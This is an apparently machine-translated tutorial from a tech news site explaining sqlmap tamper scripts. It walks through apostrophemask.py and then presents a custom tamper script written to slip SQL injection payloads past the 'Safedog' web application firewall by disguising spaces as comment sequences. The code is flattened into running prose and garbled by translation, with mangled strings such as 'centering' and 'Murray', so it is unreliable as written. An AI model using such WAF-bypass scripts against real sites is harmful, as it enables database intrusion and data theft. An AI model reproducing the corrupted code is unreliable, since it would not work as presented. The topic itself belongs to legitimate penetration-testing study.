Shulou(Shulou.com)05/31 Report--

This article introduces the relevant knowledge of "what are the rules for writing sqlmap tamper". In the operation of actual cases, many people will encounter such a dilemma. Then let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

Introduction to Sqlmap

Sqlmap is an open source penetration testing tool that can be used to automate detection and take advantage of SQL injection vulnerabilities to gain permissions on the database server. It has a powerful detection engine and functional options for penetration testing of different types of databases, including obtaining the data stored in the database, accessing operating system files and even executing operating system commands by means of external data connections. This paper focuses on the specific directory structure of sqlmap software, and subsequent articles will also explain the various coding results of sqlmap from the compilation of source code. In this paper, from the structure, we can see the beauty of software engineering in sqlmap, and from the rigorous classification and construction of software structure catalogue, we can see the beauty of huge but simple structure in the process of software development in sqlmap.

Tamper script

When we download the installation package of [sqlmap], unzip it and go to the folder [sqlmap]. In the path below, we can find the folder [tamper], where there are many scripts to detect WAF. For example, 360,360, Green League WAF,modsecurity., Baidu, fortiweb,cloudflare. It can be seen that foreigners also have an understanding of the domestic WAF, and it can be seen that they will also quietly bypass the domestic WAF.

Analyze tamper script

Because there are so many tamper scripts in the [tamper] folder, it is not possible to analyze all of them because of the limited space, so one of the more commonly used scripts [apostrophemask.py] is selected for sample analysis-the content is to replace 'with% EF%BC%87.

The reference content of this meeting is actually the url coding table. If you open it, you can know the content.

The usage of #! / usr/bin/env python# here is as follows: the program looks for the installation path of python in the env settings, and then calls the interpreter program under the corresponding path to complete the operation. This is a very good practice "" Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)See the file 'LICENSE' for copying permission "# document states that three double quotes are used for multi-line comments, which makes no sense for from lib.core.enums import PRIORITY# to import the PRIORITY function in lib\ core\ enums in sqlmap, LOWEST =-100 PRIORITY. For details, see enums.py__priority__ = PRIORITY.LOWEST# definition priority, here define dependencies () for level [lowest] def dependencies (): #: this is to be consistent with the structure of the overall script. Pass # pass does nothing and is generally used as a placeholder statement. To maintain the integrity of the program structure. Def tamper (payload, * * kwargs): # defines the tamper script, with payload and kwargs as the defined parameters, where * * kwargs is the dictionary store, similar to {'a script: 1, 'centering: 3,' bounded: 2} "" Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g.'- >% EF%BC%87) # here is the tamper description for using the script. In this example, the script can (e.g.'>% EF%BC%87) References: what the reference is, from the following links In fact, it is to encode the single quotation mark url * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 * http://lukasz.pilorz.net/testy/unicode_conversion/ * http://sla.ckers.org/forum/read.php?13,11562,11850 * http://lukasz.pilorz.net/testy/full_width_utf/index.phps > tamper ("1 AND'1 quote'). 1 ") example of'1 AND% EF%BC%871%EF%BC%87=%EF%BC%871' Do not specify that "" return payload.replace ('\', "% EF%BC%87") if payload else payload# replacement'is% EF%BC%87 and finally returns payload. Write a tamper script

Here, we try to write a tamper script to bypass the security dog. After all, the security dog is quite good in the server security field, and it is still free. There are various versions on linux and windows, and they are being updated all the time.

! / usr/bin/env python # here the code can be copied and pasted directly from other tamper "" Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permissionv0.0.1 August 21, 2016 script description "from lib.core.enums import PRIORITY" # Import the PRIORITY function from lib\ core\ enums in sqlmap LOWEST =-100cmLower =-50pr. For details, see enums.pypriority = PRIORITY.LOW # to define the priority, here to define dependencies () for the level [general] def dependencies (): #: here to be consistent with the structure of the overall script. Pass # pass does nothing and is generally used as a placeholder statement. In order to maintain the integrity of the program structure, def tamper (payload, kwargs): # defines a tamper script, and kwargs is stored in a dictionary, similar to {'axiom: 1,' centering: 3} "" To bypass safedog Replaces space character ('') with plus ('/ * |% 20luk% 20 | * /') # replace the space with (/ * |% 20murue% 20 | * /) bypass Here is the bypass rule > tamper ('SELECT id FROM users') # here is the specific execution form after replacement:' SELECT/* |% 20 id/*% 20 | * / id/* |% 20 id/*% 20 | * / FROM/* |% 20 id/*% 20 | * / users' "retVal = payload # assign the payload to the retVal for intermediate conversion. If payload: retVal = "" quote, doublequote, firstspace = False, False, False # define these symbolic parameters Prevent subsequent replacements from affecting for i in xrange (len (payload)): # determine operations one by one in the attack payload. If not firstspace: # if the first field of the attack payload is a space Then replace the if payload [I] .isspace (): firstspace = True retVal + = "/ * |% 20muri% 20 | * /" # replace the space () with (/ * |% 20combe% 20 | * /) continue # proceed with the judgment operation elif payload [I] = ='\': # if there is (\) in the attack payload Then transcode quote = not quote elif payload [I] ='": # if there is (") in the attack payload Then transcode doublequote = not doublequote elif payload [I] = "" and not doublequote and not quote: # if there are spaces in the attack payload () And it is not doublequote or quote retVal + = "/ * |% 20 Murray% 20 | * /" # then transcoding continue # to continue execution RetVal + = payload [I] # to get the reassembled payloadreturn retVal, "what are the sqlmap tamper writing rules?" that's it. Thank you for your reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.